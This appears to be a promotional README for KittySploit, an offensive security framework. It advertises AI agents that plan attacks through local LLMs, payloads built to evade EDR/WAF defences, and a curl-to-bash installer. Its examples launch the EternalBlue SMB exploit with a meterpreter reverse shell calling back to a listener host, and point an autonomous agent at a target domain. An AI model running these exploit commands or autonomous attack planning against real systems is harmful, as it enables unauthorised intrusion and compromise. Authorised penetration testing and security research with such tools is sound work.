While traditional tools struggle with modern web architectures and automated defense, KittySploit redefines the offensive landscape with cutting-edge tech:
| Autonomous AI | Zig Payloads | Live Collab | Smart Proxy |
|---|---|---|---|
| AI agents that plan attacks via local LLMs (Ollama). | Stealthy payloads compiled with integrated Zig 0.16. | Real-time shared editor for seamless team operations. | Auto-detects tech and runs modules directly from traffic. |
- Autonomous Agent: Feed a target, and the AI handles reconnaissance and suggests exploitation paths.
- Ultra-Fast Core: Dependency-free x64 polymorphic encoders and a high-performance Python core.
- Evasion-First: Advanced obfuscation and multi-protocol session handling to bypass modern EDR/WAF.
- KittyProxy: Intelligent web proxy that auto-discovers REST APIs, GraphQL, and WebSockets.
- Modern Web UI: Beautiful and intuitive graphical interfaces for proxy analysis and collaborative editing.
- Marketplace: Easily install or share new modules through our community-driven marketplace.
![]() |
![]() |
| Interactive CLI | Traffic Analysis Detail |
![]() |
![]() |
| Collaborative Editor | Intelligent OSINT Graph |
![]() |
![]() |
| GUI interface | AI-Powered Proxy |
Linux / macOS One-Liner:
curl -fsSL https://raw.githubusercontent.com/SIA-IOTechnology/kittysploit-framework/main/install/install-standalone.sh | bashor
git clone https://github.com/SIA-IOTechnology/Kittysploit-framework && cd Kittysploit-framework && install\install.shWindows:
git clone https://github.com/SIA-IOTechnology/Kittysploit-framework && cd Kittysploit-framework && install\install.batStart the Web UI:
python kittyproxy.py # Accessible at http://localhost:8000Let the framework plan your attack using a local LLM:
# Start an autonomous agent with Llama 3.1
kittysploit agent target.com --llm-local --llm-model llama3.1:8bUse the built-in plugin to connect KittySploit to a remote Metasploit RPC service and launch Metasploit modules from the framework:
plugin run metasploit connect --host 192.168.1.50 --port 55553 --user msf --pass secret
plugin run metasploit search smb
plugin run metasploit execute exploit/windows/smb/ms17_010_eternalblue --payload payload/windows/x64/meterpreter/reverse_tcp --set RHOSTS=10.10.10.12 --set LHOST=10.10.10.5 --set LPORT=4444More examples are available in USAGE.md.
| Feature | KittySploit | Metasploit | Cobalt Strike |
|---|---|---|---|
| Language | Python / Zig | Ruby | Java |
| Live Collaboration | ✅ | ❌ | ✅ |
| AI/LLM Planning | ✅ | ❌ | ❌ |
| Modern Payloads | ✅ (Zig/ASM) | ✅ | |
| Native Tor Routing | ✅ | ❌ | |
| Integrated Marketplace | ✅ | ❌ | ❌ |
| GUI / Web UI | ✅ | ❌ | ✅ |
| Complex Workflows | ✅ | ✅ | |
| Open Source | ✅ | ✅ | ❌ |
If you find this project useful, please consider giving it a ⭐. It helps others discover the framework!






